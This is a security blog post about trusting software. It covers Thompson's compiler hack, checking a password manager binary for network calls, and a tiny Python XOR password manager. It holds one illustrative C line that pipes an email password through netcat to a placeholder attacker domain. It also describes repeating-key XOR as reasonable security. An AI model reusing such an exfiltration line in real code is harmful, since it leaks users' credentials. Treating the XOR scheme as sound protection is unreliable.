One of UNIX's fathers, Ken Thompson (apart from being the reason you see a.out files when compiling without arguments), posed a groundbreaking question in 1984 (a really controversial date!): “Do you trust your compiler? Do you trust your compiler so much that you are sure that when you compile the /bin/login binary, it won't plant a backdoor in it?”. I am talking about the well-known “Ken Thompson Hack”, documented in his awesome paper “Reflections on Trusting Trust”.

The truth is we trust our default gcc installation and –seriously– never question it. It seems far-fetched to believe that there is such a possibility. The reason is that we would have to be reverse engineers to actually Check It. And this isn't the case for most of us…

 

 

Asking for and gaining Trust

My case study subject

Do you know about the kind of application called a “Password Manager”? Applications like “KeePass” that keep all your passwords in one place. They save them to disk in encrypted form and copy them to your clipboard whenever you need them, while you protect them all with a single “Master Password/Decryption Key”.

Asking for Trust

Those applications need a whole lot of trust from the users that use them. They could easily exfiltrate all your passwords to an unknown location without you noticing. In reality, the only password worth exfiltrating is your email account's password. If someone gets your email password, the “Forgot my Password” button can do the rest of the work on every website you've registered to…

Gaining Trust

So how does an application so crucial to your privacy gain Trust?

Well, most of the time it doesn't. Most of the time people assume that the binaries they download will do what they are described to do. Same for their DLLs. But that's because most people can't actually check what an executable is doing. They trust because of their inability to know.

We need to go deeper

For an infosec researcher, trust is gained. I trust that nmap works the way it works because I have wireshark'd it a whole lot of times. I am sure https meterpreter is stealthy enough in many cases, as I had it bypass my own firewall first. And I trust that keepass doesn't make remote connections because of this:

n0p_sl3d@hostname:~$ objdump -D $(which keepassx) | grep socket
n0p_sl3d@hostname:~$

while:

n0p_sl3d@hostname:~$ objdump -D $(which netcat) | grep socket | wc -l
874

If you are used to C-language Socket Programming, you know that the way to open a network connection is through the socket function. And in the unstripped, non-statically compiled version of keepassx I use, there are no such calls in the binary. That's definitely a good sign! Some trust is gained now!

But if you think of it, a call like:

sprintf(cmd, "echo %s | nc bad-domain.ddns.net 8080", email_password);
system(cmd);   /* no socket() in sight, yet the password leaves the box */

doesn't create a socket but would still exfiltrate my pass. That's why it matters that keepass is Open Source. Just grep the code for similar-looking calls; if you find any, keepass is a nasty traitor…

Sure, that's a lot of work, but it is also your call how far you go, depending on how much you value your passwords. It's a trade-off.

 

For the Unconvinced

If keepass has a backdoor (while open-source) it has to be hidden in a smart way. And while you don’t know the author, you can’t be sure about his intentions. The only way to trust some things is to be 100% sure about how they operate. That brings us to the last part of this post:

 

100% Trust

The person highest in the Trust Scale we maintain inside us is ourself. We ultimately believe our own eyes and hands. The Password Manager we will trust the most is the one we write ourselves, or the one whose code we carefully went through and understood line by line.

This tends to be impossible for most Open Source projects, sometimes even for their contributors. Trust in Open Source projects calls for smaller, more comprehensible projects, in a Programming Language made for humans, for the desired 100% to be achieved…

 

Python to the rescue!

There are like 15 actively used Programming Languages nowadays, but the ones that stand a tiny chance of being understood in the blink of an eye are the English-like scripting ones (that means Python only).

So the goal was to create a Proof of Concept Python Password Manager that wouldn't exceed 50 lines of code (single file) and would provide reasonable security, while being as easy to understand as possible and maintaining the basic features. That way people would use it and be absolutely sure about what it does. The goal was to convince the unconvinced that this tool works as intended, and only as intended. And here it is!

TinyPwdMan

TinyPwdMan‘s code can be found here: https://github.com/operatorequals/TinyPwdMan/blob/master/TinyPwdMan.py

The Source Code fits in a single page without scrolling! It uses a master password, XOR encryption, and can even copy to the clipboard. Its initial size is 38 lines.
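
The core XOR trick is tiny. A standalone sketch of the idea (not TinyPwdMan's actual code) looks like this:

from itertools import cycle

def xor_crypt(data, key):
    # XOR every byte with the repeating key; running it twice restores the input
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

secret = xor_crypt(b"hunter2", b"Ma5terPa55")
print(xor_crypt(secret, b"Ma5terPa55"))   # b'hunter2'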

It isn't designed for real use (while it works flawlessly), but as a demonstration of what can really be absolutely trusted, versus what is trusted because of its convenience. Because let me tell you: keepass blows that little Password Manager out of the water when it comes to convenience.

Either way, your passwords are as unsafe as the weakest link of the chain in which you use them. From mind, to keyboard, to OS, to application, to network, to the other side.

And the weakest link is not the encryption, nor the possibility of an exfiltration that would cost a Password Manager Author his reputation (once discovered), and probably his career and life.

The weakest link is you!

 
